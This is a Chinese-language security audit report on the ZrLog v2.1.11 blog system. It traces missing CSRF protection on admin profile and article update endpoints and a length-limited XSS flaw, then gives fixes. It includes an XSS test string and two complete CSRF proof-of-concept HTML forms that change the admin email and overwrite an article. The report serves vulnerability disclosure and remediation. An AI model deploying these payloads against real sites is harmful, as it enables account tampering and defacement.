ZrLog v2.1.11 代码审计报告与漏洞分析<\/h1>

1. 系统概述<\/h2>

ZrLog 是一款使用 Java 开发的博客\/CMS 程序，具有以下特点：<\/p>

简约易用<\/li>
组件化设计<\/li>
内存占用低<\/li>

自带 Markdown 编辑器<\/li> <\/ul>

2. 审计发现的安全漏洞<\/h2>

2.1 CSRF 漏洞（个人信息修改）<\/h3>

漏洞分析<\/h4>

框架分析<\/strong>：<\/p>

检查 pom.xml<\/code> 文件，确认未使用 Spring 框架及 spring-security<\/code> 组件<\/li>
缺少对 CSRF 的默认防护机制<\/li> <\/ul> <\/li>
路由分析<\/strong>：<\/p> web.xml<\/code> 中通过 com.zrlog.web.config.ZrLogConfig<\/code> 进行访问控制<\/li> configRoute<\/code> 方法包含三条路由，其中管理员路由由 AdminRoutes<\/code> 控制<\/li> \/api\/admin<\/code> 接口由 AdminController<\/code> 类控制<\/li> <\/ul> <\/li> 漏洞点<\/strong>：<\/p> AdminController<\/code> 类的 update<\/code> 方法处理个人信息修改<\/li> 方法流程：解析请求体<\/li> 检查必要参数<\/li> 根据运行模式和用户权限处理<\/li> 返回响应对象<\/li> <\/ul> <\/li> 整个流程未经过任何 filter<\/code> 类拦截<\/li> <\/ul> <\/li> <\/ol> 漏洞复现步骤<\/h4> 登录后台，进入个人信息页面<\/li> 修改任意信息并提交，使用 Burp Suite 拦截请求<\/li> 修改 email<\/code> 参数为 test_test@qq.com<\/code><\/li> 使用 Burp Suite 生成 CSRF POC<\/li> 启动 HTTP 服务，浏览器访问 POC 页面<\/li> 提交请求后，验证邮箱信息是否被修改<\/li> <\/ol> 2.2 XSS 漏洞（个人信息处）<\/h3> 漏洞分析<\/h4> 漏洞点<\/strong>：<\/p> 个人信息接口未对输入进行 XSS 过滤<\/li> 可与 CSRF 形成组合攻击（CSRF+XSS 获取 cookie）<\/li> <\/ul> <\/li> 限制条件<\/strong>：<\/p> 输入长度限制为 15 个字符<\/li> 超过长度会报错<\/li> <\/ul> <\/li> <\/ol> 漏洞验证<\/h4> 尝试输入 XSS payload 发现长度限制<\/li> 输入 1<script>alert(1)<\/script><\/code> 测试（受长度限制无法完整输入）<\/li> 确认存在 XSS 漏洞但受长度限制难以利用<\/li> <\/ol> 2.3 CSRF 漏洞（文章修改）<\/h3> 漏洞分析<\/h4> 路由分析<\/strong>：<\/p> AdminRoutes<\/code> 类中的文章处理接口<\/li> 由 ArticleController<\/code> 类的 update<\/code> 方法处理文章更新<\/li> <\/ul> <\/li> 调用链<\/strong>：<\/p> update<\/code> 方法调用 articleService.update()<\/code><\/li> articleService<\/code> 实例化为 ArticleService<\/code> 类（位于 service-2.1.1.jar<\/code>）<\/li> update<\/code> 方法调用 save<\/code> 方法处理创建\/更新文章<\/li> <\/ul> <\/li> 漏洞点<\/strong>：<\/p> 整个流程无 CSRF 防护机制<\/li> 可未经授权修改文章内容<\/li> <\/ul> <\/li> <\/ol> 漏洞复现步骤<\/h4> 登录后台，进入文章管理模块<\/li> 编辑任意文章，拦截请求<\/li> 使用 Burp Suite 生成 CSRF POC（示例代码已提供）<\/li> 浏览器访问生成的 POC 页面<\/li> 提交请求后验证文章是否被修改<\/li> <\/ol> 3. 漏洞利用代码示例<\/h2> 个人信息修改 CSRF POC<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><script<\/span>>history<\/span>.pushState<\/span>(''<\/span>, ''<\/span>, '\/'<\/span>)<\/script<\/span>> <\/span><\/span><form<\/span> action<\/span>=<\/span>"http:\/\/target\/api\/admin\/update"<\/span> method<\/span>=<\/span>"POST"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"email"<\/span> value<\/span>=<\/span>"attacker@example.com"<\/span> \/> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Submit request"<\/span> \/> <\/span><\/span><\/form<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>文章修改 CSRF POC<\/h3> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><script<\/span>>history<\/span>.pushState<\/span>(''<\/span>, ''<\/span>, '\/'<\/span>)<\/script<\/span>> <\/span><\/span><form<\/span> action<\/span>=<\/span>"http:\/\/target\/api\/admin\/article\/update"<\/span> method<\/span>=<\/span>"POST"<\/span> enctype<\/span>=<\/span>"text\/plain"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>'{"id":"2","editorType":"markdown","title":"Hacked","alias":"hacked","thumbnail":null,"typeId":"1","keywords":null,"digest":"<p>Hacked<\/p>","canComment":false,"recommended":false,"privacy":false,"content":"<p>Hacked<\/p>\n","markdown":"Hacked","rubbish":"'<\/span>value<\/span>"<\/span> value<\/span>=<\/span>"'false"<\/span>}'<\/span> \/> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Submit request"<\/span> \/> <\/span><\/span><\/form<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>4. 修复建议<\/h2> CSRF 防护<\/strong>：<\/p> 添加 CSRF Token 机制<\/li> 对敏感操作使用 POST 请求并验证 Referer<\/li> 考虑引入 Spring Security 框架<\/li> <\/ul> <\/li> XSS 防护<\/strong>：<\/p> 对所有用户输入进行严格的过滤和转义<\/li> 实现输出编码<\/li> 设置 Content Security Policy (CSP)<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 对个人信息字段增加合理的长度限制<\/li> 对文章内容等长文本字段也应进行基本的 XSS 过滤<\/li> <\/ul> <\/li> 架构改进<\/strong>：<\/p> 实现统一的权限验证过滤器<\/li> 对管理员操作进行二次验证（如密码确认）<\/li> <\/ul> <\/li> <\/ol> 5. 总结<\/h2> 本次审计发现 ZrLog v2.1.11 存在多处安全漏洞，主要集中在：<\/p> 缺乏 CSRF 防护导致的信息修改和文章篡改风险<\/li> 输入验证不严导致的 XSS 漏洞（虽受长度限制但仍存在风险）<\/li> <\/ol> 建议开发者尽快修复这些漏洞，特别是在处理敏感操作时增加身份验证和请求合法性校验。<\/p>